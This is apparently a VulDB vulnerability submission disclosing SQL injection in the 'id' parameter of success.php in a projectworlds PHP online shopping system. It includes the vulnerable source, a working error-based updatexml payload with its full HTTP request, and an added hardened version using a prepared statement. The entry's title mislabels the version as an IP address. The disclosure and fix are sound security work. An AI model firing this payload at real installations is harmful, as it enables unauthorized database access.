Submission #440337: projectworlds Free Download Online Shopping System v1.0 SQL Injection (info)

Title: projectworlds Free Download Online Shopping System v1.0 SQL Injection

Description:

# SQL Injection vulnerability was discovered in Free Download Online Shopping System (success.php)

Official Website: https://projectworlds.in/free-projects/php-projects/free-download-online-shopping-system/

Version: 1.0

Related Code file: /online-shopping-webvsite-in-php-master/success.php

dbname=store

Payload: /online-shopping-webvsite-in-php-master/success.php?id=1 and(select updatexml(1,concat(0x7e,(select database())),1))--+

<hr>

```php
<?php
session_start();
require 'connection.php';
if(!isset($_SESSION['email'])){
    header('location:index.php');
}else{
    // $_GET['id'] is concatenated straight into the UPDATE statement
    $user_id=$_GET['id'];
    $confirm_query="update users_items set status='Confirmed' where user_id=$user_id";
    $confirm_query_result=mysqli_query($con,$confirm_query) or die(mysqli_error($con));
}
?>
```

The id variable is inserted directly into the SQL query without any escaping or parameterization, so an attacker can inject SQL by manipulating the id field (line number 1-12 of ).

Injection parameter: id

```
GET /online-shopping-webvsite-in-php-master/success.php?id=1%20and(select%20updatexml(1,concat(0x7e,(select%20database())),1))--+ HTTP/1.1
Host: 192.168.1.88
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=jv9bat9nq7anb7bgkppu8kp2oc
Connection: close
```

![image](https://github.com/user-attachments/assets/10c36eaa-4f5f-464d-97e1-20f2282690e0)
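The following hardened `success.php` is an added example, not code from the project or the report. It keeps the page's behaviour (mark a user's items as Confirmed) but validates `id` as an integer, binds it with a prepared statement, and logs database errors instead of printing them with `die(mysqli_error(...))`, which is what an error-based payload such as the `updatexml` one above relies on. It assumes, as the original does, that `connection.php` provides a mysqli handle in `$con`.

```php
<?php
// Added example (not the project's code): hardened success.php.
// Assumes connection.php defines a mysqli connection in $con.
session_start();
require 'connection.php';

if (!isset($_SESSION['email'])) {
    header('Location: index.php');
    exit; // the original kept executing after the redirect header
}

// Accept only a positive integer. A value such as "1 and(select ...)"
// fails validation here and never reaches the database at all.
$user_id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 1]]);
if ($user_id === false || $user_id === null) {
    http_response_code(400);
    exit('Invalid id');
}

// Parameterised query: the SQL text is fixed and the id is sent
// separately as a bound integer, so it can only ever be data.
$stmt = $con->prepare(
    "UPDATE users_items SET status = 'Confirmed' WHERE user_id = ?"
);
if ($stmt === false) {
    // Keep driver error text out of the response; log it server-side.
    error_log('prepare failed: ' . $con->error);
    http_response_code(500);
    exit('Internal error');
}
$stmt->bind_param('i', $user_id);
if (!$stmt->execute()) {
    error_log('execute failed: ' . $stmt->error);
    http_response_code(500);
    exit('Internal error');
}
$stmt->close();
?>
```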
Source: https://github.com/Sy0ung-cmd/Cve-report/blob/main/SQLi-1.md
User: SunYihang (UID 77239)
Submitted: 2024-11-09 12:41 (1 year ago)
Moderated: 2024-11-10 09:32 (21 hours later)
Status: accepted
VulDB entry: 283805 [Project Worlds Free Download Online Shopping System up to 192.168.1.88 success.php id sql injection]
Points: 20
